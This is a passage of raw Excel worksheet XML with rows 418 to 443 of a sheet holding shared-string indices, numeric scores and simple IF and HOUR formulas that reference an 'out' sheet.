      <c r="R418" s="18"/>
      <c r="S418" s="4"/>
      <c r="T418" s="4"/>
      <c r="U418" s="4"/>
      <c r="V418" s="7"/>
    </row>
    <row r="419" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A419" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B419" s="4" t="s">
        <v>2376</v>
      </c>
      <c r="C419" s="4" t="s">
        <v>2377</v>
      </c>
      <c r="D419" s="4" t="s">
        <v>2378</v>
      </c>
      <c r="E419" s="4" t="s">
        <v>2379</v>
      </c>
      <c r="F419" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G419" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H419" s="4">
        <v>7.1</v>
      </c>
      <c r="I419" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J419" s="4"/>
      <c r="K419" s="4"/>
      <c r="L419" s="4">
        <f>IF(out!$G419="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M419" s="4"/>
      <c r="N419" s="4"/>
      <c r="O419" s="13"/>
      <c r="P419" s="4"/>
      <c r="Q419" s="13">
        <f>HOUR(out!$P419 -out!$N419)</f>
        <v>0</v>
      </c>
      <c r="R419" s="18"/>
      <c r="S419" s="4"/>
      <c r="T419" s="4"/>
      <c r="U419" s="4"/>
      <c r="V419" s="7"/>
    </row>
    <row r="420" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A420" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B420" s="4" t="s">
        <v>2380</v>
      </c>
      <c r="C420" s="4" t="s">
        <v>2381</v>
      </c>
      <c r="D420" s="4" t="s">
        <v>2382</v>
      </c>
      <c r="E420" s="4" t="s">
        <v>2383</v>
      </c>
      <c r="F420" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G420" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H420" s="4">
        <v>7.1</v>
      </c>
      <c r="I420" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J420" s="4"/>
      <c r="K420" s="4"/>
      <c r="L420" s="4">
        <f>IF(out!$G420="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M420" s="4"/>
      <c r="N420" s="4"/>
      <c r="O420" s="13"/>
      <c r="P420" s="4"/>
      <c r="Q420" s="13">
        <f>HOUR(out!$P420 -out!$N420)</f>
        <v>0</v>
      </c>
      <c r="R420" s="18"/>
      <c r="S420" s="4"/>
      <c r="T420" s="4"/>
      <c r="U420" s="4"/>
      <c r="V420" s="7"/>
    </row>
    <row r="421" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A421" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B421" s="4" t="s">
        <v>2384</v>
      </c>
      <c r="C421" s="4" t="s">
        <v>2385</v>
      </c>
      <c r="D421" s="4" t="s">
        <v>2386</v>
      </c>
      <c r="E421" s="4" t="s">
        <v>2387</v>
      </c>
      <c r="F421" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G421" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H421" s="4">
        <v>7.1</v>
      </c>
      <c r="I421" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J421" s="4"/>
      <c r="K421" s="4"/>
      <c r="L421" s="4">
        <f>IF(out!$G421="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M421" s="4"/>
      <c r="N421" s="4"/>
      <c r="O421" s="13"/>
      <c r="P421" s="4"/>
      <c r="Q421" s="13">
        <f>HOUR(out!$P421 -out!$N421)</f>
        <v>0</v>
      </c>
      <c r="R421" s="18"/>
      <c r="S421" s="4"/>
      <c r="T421" s="4"/>
      <c r="U421" s="4"/>
      <c r="V421" s="7"/>
    </row>
    <row r="422" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A422" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B422" s="4" t="s">
        <v>2388</v>
      </c>
      <c r="C422" s="4" t="s">
        <v>2389</v>
      </c>
      <c r="D422" s="4" t="s">
        <v>2390</v>
      </c>
      <c r="E422" s="4" t="s">
        <v>2391</v>
      </c>
      <c r="F422" s="4" t="s">
        <v>2392</v>
      </c>
      <c r="G422" s="4" t="s">
        <v>2393</v>
      </c>
      <c r="H422" s="4">
        <v>7.1</v>
      </c>
      <c r="I422" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J422" s="4"/>
      <c r="K422" s="4"/>
      <c r="L422" s="4">
        <f>IF(out!$G422="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M422" s="4"/>
      <c r="N422" s="4"/>
      <c r="O422" s="13"/>
      <c r="P422" s="4"/>
      <c r="Q422" s="13">
        <f>HOUR(out!$P422 -out!$N422)</f>
        <v>0</v>
      </c>
      <c r="R422" s="18"/>
      <c r="S422" s="4"/>
      <c r="T422" s="4"/>
      <c r="U422" s="4"/>
      <c r="V422" s="7"/>
    </row>
    <row r="423" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A423" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B423" s="4" t="s">
        <v>2394</v>
      </c>
      <c r="C423" s="4" t="s">
        <v>2395</v>
      </c>
      <c r="D423" s="4" t="s">
        <v>2396</v>
      </c>
      <c r="E423" s="4" t="s">
        <v>2397</v>
      </c>
      <c r="F423" s="4" t="s">
        <v>943</v>
      </c>
      <c r="G423" s="4" t="s">
        <v>2398</v>
      </c>
      <c r="H423" s="4">
        <v>7.1</v>
      </c>
      <c r="I423" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J423" s="4"/>
      <c r="K423" s="4"/>
      <c r="L423" s="4">
        <f>IF(out!$G423="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M423" s="4"/>
      <c r="N423" s="4"/>
      <c r="O423" s="13"/>
      <c r="P423" s="4"/>
      <c r="Q423" s="13">
        <f>HOUR(out!$P423 -out!$N423)</f>
        <v>0</v>
      </c>
      <c r="R423" s="18"/>
      <c r="S423" s="4"/>
      <c r="T423" s="4"/>
      <c r="U423" s="4"/>
      <c r="V423" s="7"/>
    </row>
    <row r="424" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A424" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B424" s="4" t="s">
        <v>2399</v>
      </c>
      <c r="C424" s="4" t="s">
        <v>2400</v>
      </c>
      <c r="D424" s="4" t="s">
        <v>2401</v>
      </c>
      <c r="E424" s="4" t="s">
        <v>2402</v>
      </c>
      <c r="F424" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G424" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H424" s="4">
        <v>7.1</v>
      </c>
      <c r="I424" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J424" s="4"/>
      <c r="K424" s="4"/>
      <c r="L424" s="4">
        <f>IF(out!$G424="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M424" s="4"/>
      <c r="N424" s="4"/>
      <c r="O424" s="13"/>
      <c r="P424" s="4"/>
      <c r="Q424" s="13">
        <f>HOUR(out!$P424 -out!$N424)</f>
        <v>0</v>
      </c>
      <c r="R424" s="18"/>
      <c r="S424" s="4"/>
      <c r="T424" s="4"/>
      <c r="U424" s="4"/>
      <c r="V424" s="7"/>
    </row>
    <row r="425" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A425" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B425" s="4" t="s">
        <v>2403</v>
      </c>
      <c r="C425" s="4" t="s">
        <v>2404</v>
      </c>
      <c r="D425" s="4" t="s">
        <v>2405</v>
      </c>
      <c r="E425" s="4" t="s">
        <v>2406</v>
      </c>
      <c r="F425" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G425" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H425" s="4">
        <v>7.1</v>
      </c>
      <c r="I425" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J425" s="4"/>
      <c r="K425" s="4"/>
      <c r="L425" s="4">
        <f>IF(out!$G425="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M425" s="4"/>
      <c r="N425" s="4"/>
      <c r="O425" s="13"/>
      <c r="P425" s="4"/>
      <c r="Q425" s="13">
        <f>HOUR(out!$P425 -out!$N425)</f>
        <v>0</v>
      </c>
      <c r="R425" s="18"/>
      <c r="S425" s="4"/>
      <c r="T425" s="4"/>
      <c r="U425" s="4"/>
      <c r="V425" s="7"/>
    </row>
    <row r="426" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A426" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B426" s="4" t="s">
        <v>2407</v>
      </c>
      <c r="C426" s="4" t="s">
        <v>2408</v>
      </c>
      <c r="D426" s="4" t="s">
        <v>2409</v>
      </c>
      <c r="E426" s="4" t="s">
        <v>2410</v>
      </c>
      <c r="F426" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G426" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H426" s="4">
        <v>7.1</v>
      </c>
      <c r="I426" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J426" s="4"/>
      <c r="K426" s="4"/>
      <c r="L426" s="4">
        <f>IF(out!$G426="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M426" s="4"/>
      <c r="N426" s="4"/>
      <c r="O426" s="13"/>
      <c r="P426" s="4"/>
      <c r="Q426" s="13">
        <f>HOUR(out!$P426 -out!$N426)</f>
        <v>0</v>
      </c>
      <c r="R426" s="18"/>
      <c r="S426" s="4"/>
      <c r="T426" s="4"/>
      <c r="U426" s="4"/>
      <c r="V426" s="7"/>
    </row>
    <row r="427" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A427" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B427" s="4" t="s">
        <v>2411</v>
      </c>
      <c r="C427" s="4" t="s">
        <v>2412</v>
      </c>
      <c r="D427" s="4" t="s">
        <v>2413</v>
      </c>
      <c r="E427" s="4" t="s">
        <v>2414</v>
      </c>
      <c r="F427" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G427" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H427" s="4">
        <v>7.1</v>
      </c>
      <c r="I427" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J427" s="4"/>
      <c r="K427" s="4"/>
      <c r="L427" s="4">
        <f>IF(out!$G427="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M427" s="4"/>
      <c r="N427" s="4"/>
      <c r="O427" s="13"/>
      <c r="P427" s="4"/>
      <c r="Q427" s="13">
        <f>HOUR(out!$P427 -out!$N427)</f>
        <v>0</v>
      </c>
      <c r="R427" s="18"/>
      <c r="S427" s="4"/>
      <c r="T427" s="4"/>
      <c r="U427" s="4"/>
      <c r="V427" s="7"/>
    </row>
    <row r="428" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A428" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B428" s="4" t="s">
        <v>2415</v>
      </c>
      <c r="C428" s="4" t="s">
        <v>2416</v>
      </c>
      <c r="D428" s="4" t="s">
        <v>2417</v>
      </c>
      <c r="E428" s="4" t="s">
        <v>2418</v>
      </c>
      <c r="F428" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G428" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H428" s="4">
        <v>7.1</v>
      </c>
      <c r="I428" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J428" s="4"/>
      <c r="K428" s="4"/>
      <c r="L428" s="4">
        <f>IF(out!$G428="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M428" s="4"/>
      <c r="N428" s="4"/>
      <c r="O428" s="13"/>
      <c r="P428" s="4"/>
      <c r="Q428" s="13">
        <f>HOUR(out!$P428 -out!$N428)</f>
        <v>0</v>
      </c>
      <c r="R428" s="18"/>
      <c r="S428" s="4"/>
      <c r="T428" s="4"/>
      <c r="U428" s="4"/>
      <c r="V428" s="7"/>
    </row>
    <row r="429" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A429" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B429" s="4" t="s">
        <v>2419</v>
      </c>
      <c r="C429" s="4" t="s">
        <v>2420</v>
      </c>
      <c r="D429" s="4" t="s">
        <v>2421</v>
      </c>
      <c r="E429" s="4" t="s">
        <v>2422</v>
      </c>
      <c r="F429" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G429" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H429" s="4">
        <v>7.1</v>
      </c>
      <c r="I429" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J429" s="4"/>
      <c r="K429" s="4"/>
      <c r="L429" s="4">
        <f>IF(out!$G429="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M429" s="4"/>
      <c r="N429" s="4"/>
      <c r="O429" s="13"/>
      <c r="P429" s="4"/>
      <c r="Q429" s="13">
        <f>HOUR(out!$P429 -out!$N429)</f>
        <v>0</v>
      </c>
      <c r="R429" s="18"/>
      <c r="S429" s="4"/>
      <c r="T429" s="4"/>
      <c r="U429" s="4"/>
      <c r="V429" s="7"/>
    </row>
    <row r="430" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A430" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B430" s="4" t="s">
        <v>2423</v>
      </c>
      <c r="C430" s="4" t="s">
        <v>2424</v>
      </c>
      <c r="D430" s="4" t="s">
        <v>2425</v>
      </c>
      <c r="E430" s="4" t="s">
        <v>2426</v>
      </c>
      <c r="F430" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G430" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H430" s="4">
        <v>7.1</v>
      </c>
      <c r="I430" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J430" s="4"/>
      <c r="K430" s="4"/>
      <c r="L430" s="4">
        <f>IF(out!$G430="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M430" s="4"/>
      <c r="N430" s="4"/>
      <c r="O430" s="13"/>
      <c r="P430" s="4"/>
      <c r="Q430" s="13">
        <f>HOUR(out!$P430 -out!$N430)</f>
        <v>0</v>
      </c>
      <c r="R430" s="18"/>
      <c r="S430" s="4"/>
      <c r="T430" s="4"/>
      <c r="U430" s="4"/>
      <c r="V430" s="7"/>
    </row>
    <row r="431" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A431" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B431" s="4" t="s">
        <v>2427</v>
      </c>
      <c r="C431" s="4" t="s">
        <v>2428</v>
      </c>
      <c r="D431" s="4" t="s">
        <v>2429</v>
      </c>
      <c r="E431" s="4" t="s">
        <v>2430</v>
      </c>
      <c r="F431" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G431" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H431" s="4">
        <v>7.1</v>
      </c>
      <c r="I431" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J431" s="4"/>
      <c r="K431" s="4"/>
      <c r="L431" s="4">
        <f>IF(out!$G431="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M431" s="4"/>
      <c r="N431" s="4"/>
      <c r="O431" s="13"/>
      <c r="P431" s="4"/>
      <c r="Q431" s="13">
        <f>HOUR(out!$P431 -out!$N431)</f>
        <v>0</v>
      </c>
      <c r="R431" s="18"/>
      <c r="S431" s="4"/>
      <c r="T431" s="4"/>
      <c r="U431" s="4"/>
      <c r="V431" s="7"/>
    </row>
    <row r="432" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A432" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B432" s="4" t="s">
        <v>2431</v>
      </c>
      <c r="C432" s="4" t="s">
        <v>2432</v>
      </c>
      <c r="D432" s="4" t="s">
        <v>2433</v>
      </c>
      <c r="E432" s="4" t="s">
        <v>2434</v>
      </c>
      <c r="F432" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G432" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H432" s="4">
        <v>7.1</v>
      </c>
      <c r="I432" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J432" s="4"/>
      <c r="K432" s="4"/>
      <c r="L432" s="4">
        <f>IF(out!$G432="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M432" s="4"/>
      <c r="N432" s="4"/>
      <c r="O432" s="13"/>
      <c r="P432" s="4"/>
      <c r="Q432" s="13">
        <f>HOUR(out!$P432 -out!$N432)</f>
        <v>0</v>
      </c>
      <c r="R432" s="18"/>
      <c r="S432" s="4"/>
      <c r="T432" s="4"/>
      <c r="U432" s="4"/>
      <c r="V432" s="7"/>
    </row>
    <row r="433" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A433" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B433" s="4" t="s">
        <v>2435</v>
      </c>
      <c r="C433" s="4" t="s">
        <v>2436</v>
      </c>
      <c r="D433" s="4" t="s">
        <v>2437</v>
      </c>
      <c r="E433" s="4" t="s">
        <v>2438</v>
      </c>
      <c r="F433" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G433" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H433" s="4">
        <v>7.1</v>
      </c>
      <c r="I433" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J433" s="4"/>
      <c r="K433" s="4"/>
      <c r="L433" s="4">
        <f>IF(out!$G433="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M433" s="4"/>
      <c r="N433" s="4"/>
      <c r="O433" s="13"/>
      <c r="P433" s="4"/>
      <c r="Q433" s="13">
        <f>HOUR(out!$P433 -out!$N433)</f>
        <v>0</v>
      </c>
      <c r="R433" s="18"/>
      <c r="S433" s="4"/>
      <c r="T433" s="4"/>
      <c r="U433" s="4"/>
      <c r="V433" s="7"/>
    </row>
    <row r="434" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A434" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B434" s="4" t="s">
        <v>2439</v>
      </c>
      <c r="C434" s="4" t="s">
        <v>2440</v>
      </c>
      <c r="D434" s="4" t="s">
        <v>2441</v>
      </c>
      <c r="E434" s="4" t="s">
        <v>2442</v>
      </c>
      <c r="F434" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G434" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H434" s="4">
        <v>7.1</v>
      </c>
      <c r="I434" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J434" s="4"/>
      <c r="K434" s="4"/>
      <c r="L434" s="4">
        <f>IF(out!$G434="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M434" s="4"/>
      <c r="N434" s="4"/>
      <c r="O434" s="13"/>
      <c r="P434" s="4"/>
      <c r="Q434" s="13">
        <f>HOUR(out!$P434 -out!$N434)</f>
        <v>0</v>
      </c>
      <c r="R434" s="18"/>
      <c r="S434" s="4"/>
      <c r="T434" s="4"/>
      <c r="U434" s="4"/>
      <c r="V434" s="7"/>
    </row>
    <row r="435" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A435" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B435" s="4" t="s">
        <v>2443</v>
      </c>
      <c r="C435" s="4" t="s">
        <v>2444</v>
      </c>
      <c r="D435" s="4" t="s">
        <v>2445</v>
      </c>
      <c r="E435" s="4" t="s">
        <v>2446</v>
      </c>
      <c r="F435" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G435" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H435" s="4">
        <v>7.1</v>
      </c>
      <c r="I435" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J435" s="4"/>
      <c r="K435" s="4"/>
      <c r="L435" s="4">
        <f>IF(out!$G435="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M435" s="4"/>
      <c r="N435" s="4"/>
      <c r="O435" s="13"/>
      <c r="P435" s="4"/>
      <c r="Q435" s="13">
        <f>HOUR(out!$P435 -out!$N435)</f>
        <v>0</v>
      </c>
      <c r="R435" s="18"/>
      <c r="S435" s="4"/>
      <c r="T435" s="4"/>
      <c r="U435" s="4"/>
      <c r="V435" s="7"/>
    </row>
    <row r="436" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A436" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B436" s="4" t="s">
        <v>2447</v>
      </c>
      <c r="C436" s="4" t="s">
        <v>2448</v>
      </c>
      <c r="D436" s="4" t="s">
        <v>2449</v>
      </c>
      <c r="E436" s="4" t="s">
        <v>2450</v>
      </c>
      <c r="F436" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G436" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H436" s="4">
        <v>7.1</v>
      </c>
      <c r="I436" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J436" s="4"/>
      <c r="K436" s="4"/>
      <c r="L436" s="4">
        <f>IF(out!$G436="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M436" s="4"/>
      <c r="N436" s="4"/>
      <c r="O436" s="13"/>
      <c r="P436" s="4"/>
      <c r="Q436" s="13">
        <f>HOUR(out!$P436 -out!$N436)</f>
        <v>0</v>
      </c>
      <c r="R436" s="18"/>
      <c r="S436" s="4"/>
      <c r="T436" s="4"/>
      <c r="U436" s="4"/>
      <c r="V436" s="7"/>
    </row>
    <row r="437" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A437" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B437" s="4" t="s">
        <v>2451</v>
      </c>
      <c r="C437" s="4" t="s">
        <v>2452</v>
      </c>
      <c r="D437" s="4" t="s">
        <v>2453</v>
      </c>
      <c r="E437" s="4" t="s">
        <v>2454</v>
      </c>
      <c r="F437" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G437" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H437" s="4">
        <v>7.1</v>
      </c>
      <c r="I437" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J437" s="4"/>
      <c r="K437" s="4"/>
      <c r="L437" s="4">
        <f>IF(out!$G437="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M437" s="4"/>
      <c r="N437" s="4"/>
      <c r="O437" s="13"/>
      <c r="P437" s="4"/>
      <c r="Q437" s="13">
        <f>HOUR(out!$P437 -out!$N437)</f>
        <v>0</v>
      </c>
      <c r="R437" s="18"/>
      <c r="S437" s="4"/>
      <c r="T437" s="4"/>
      <c r="U437" s="4"/>
      <c r="V437" s="7"/>
    </row>
    <row r="438" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A438" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B438" s="4" t="s">
        <v>2455</v>
      </c>
      <c r="C438" s="4" t="s">
        <v>2456</v>
      </c>
      <c r="D438" s="4" t="s">
        <v>2457</v>
      </c>
      <c r="E438" s="4" t="s">
        <v>2458</v>
      </c>
      <c r="F438" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G438" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H438" s="4">
        <v>7.1</v>
      </c>
      <c r="I438" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J438" s="4"/>
      <c r="K438" s="4"/>
      <c r="L438" s="4">
        <f>IF(out!$G438="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M438" s="4"/>
      <c r="N438" s="4"/>
      <c r="O438" s="13"/>
      <c r="P438" s="4"/>
      <c r="Q438" s="13">
        <f>HOUR(out!$P438 -out!$N438)</f>
        <v>0</v>
      </c>
      <c r="R438" s="18"/>
      <c r="S438" s="4"/>
      <c r="T438" s="4"/>
      <c r="U438" s="4"/>
      <c r="V438" s="7"/>
    </row>
    <row r="439" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A439" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B439" s="4" t="s">
        <v>2459</v>
      </c>
      <c r="C439" s="4" t="s">
        <v>2460</v>
      </c>
      <c r="D439" s="4" t="s">
        <v>2461</v>
      </c>
      <c r="E439" s="4" t="s">
        <v>2462</v>
      </c>
      <c r="F439" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G439" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H439" s="4">
        <v>7.1</v>
      </c>
      <c r="I439" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J439" s="4"/>
      <c r="K439" s="4"/>
      <c r="L439" s="4">
        <f>IF(out!$G439="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M439" s="4"/>
      <c r="N439" s="4"/>
      <c r="O439" s="13"/>
      <c r="P439" s="4"/>
      <c r="Q439" s="13">
        <f>HOUR(out!$P439 -out!$N439)</f>
        <v>0</v>
      </c>
      <c r="R439" s="18"/>
      <c r="S439" s="4"/>
      <c r="T439" s="4"/>
      <c r="U439" s="4"/>
      <c r="V439" s="7"/>
    </row>
    <row r="440" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A440" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B440" s="4" t="s">
        <v>2463</v>
      </c>
      <c r="C440" s="4" t="s">
        <v>2464</v>
      </c>
      <c r="D440" s="4" t="s">
        <v>2465</v>
      </c>
      <c r="E440" s="4" t="s">
        <v>2466</v>
      </c>
      <c r="F440" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G440" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H440" s="4">
        <v>7.1</v>
      </c>
      <c r="I440" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J440" s="4"/>
      <c r="K440" s="4"/>
      <c r="L440" s="4">
        <f>IF(out!$G440="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M440" s="4"/>
      <c r="N440" s="4"/>
      <c r="O440" s="13"/>
      <c r="P440" s="4"/>
      <c r="Q440" s="13">
        <f>HOUR(out!$P440 -out!$N440)</f>
        <v>0</v>
      </c>
      <c r="R440" s="18"/>
      <c r="S440" s="4"/>
      <c r="T440" s="4"/>
      <c r="U440" s="4"/>
      <c r="V440" s="7"/>
    </row>
    <row r="441" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A441" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B441" s="4" t="s">
        <v>2467</v>
      </c>
      <c r="C441" s="4" t="s">
        <v>2468</v>
      </c>
      <c r="D441" s="4" t="s">
        <v>2469</v>
      </c>
      <c r="E441" s="4" t="s">
        <v>2470</v>
      </c>
      <c r="F441" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G441" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H441" s="4">
        <v>4.5999999999999996</v>
      </c>
      <c r="I441" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J441" s="4"/>
      <c r="K441" s="4"/>
      <c r="L441" s="4">
        <f>IF(out!$G441="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M441" s="4"/>
      <c r="N441" s="4"/>
      <c r="O441" s="13"/>
      <c r="P441" s="4"/>
      <c r="Q441" s="13">
        <f>HOUR(out!$P441 -out!$N441)</f>
        <v>0</v>
      </c>
      <c r="R441" s="18"/>
      <c r="S441" s="4"/>
      <c r="T441" s="4"/>
      <c r="U441" s="4"/>
      <c r="V441" s="7"/>
    </row>
    <row r="442" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A442" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B442" s="4" t="s">
        <v>2471</v>
      </c>
      <c r="C442" s="4" t="s">
        <v>2472</v>
      </c>
      <c r="D442" s="4" t="s">
        <v>2473</v>
      </c>
      <c r="E442" s="4" t="s">
        <v>2474</v>
      </c>
      <c r="F442" s="4" t="s">
        <v>239</v>
      </c>
      <c r="G442" s="4" t="s">
        <v>2475</v>
      </c>
      <c r="H442" s="4">
        <v>7.1</v>
      </c>
      <c r="I442" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J442" s="4"/>
      <c r="K442" s="4"/>
      <c r="L442" s="4">
        <f>IF(out!$G442="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M442" s="4"/>
      <c r="N442" s="4"/>
      <c r="O442" s="13"/>
      <c r="P442" s="4"/>
      <c r="Q442" s="13">
        <f>HOUR(out!$P442 -out!$N442)</f>
        <v>0</v>
      </c>
      <c r="R442" s="18"/>
      <c r="S442" s="4"/>
      <c r="T442" s="4"/>
      <c r="U442" s="4"/>
      <c r="V442" s="7"/>
    </row>
    <row r="443" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A443" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B443" s="4" t="s">
        <v>2476</v>
      </c>
      <c r="C443" s="4" t="s">
        <v>2477</v>
      </c>
      <c r="D443" s="4" t="s">
        <v>2478</v>
      </c>
      <c r="E443" s="4" t="s">
        <v>2479</v>
      </c>
      <c r="F443" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G443" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H443" s="4">
        <v>7.1</v>
      </c>
      <c r="I443" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J443" s="4"/>
      <c r="K443" s="4"/>
      <c r="L443" s="4">
        <f>IF(out!$G443="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M443" s="4"/>
      <c r="N443" s="4"/>
      <c r="O443" s="13"/>
      <c r="P443" s="4"/>
      <c r="Q443" s="13">
        <f>HOUR(out!$P443 -out!$N443)</f>
        <v>0</v>
      </c>
      <c r="R443" s="18"/>
      <c r="S443" s="4"/>
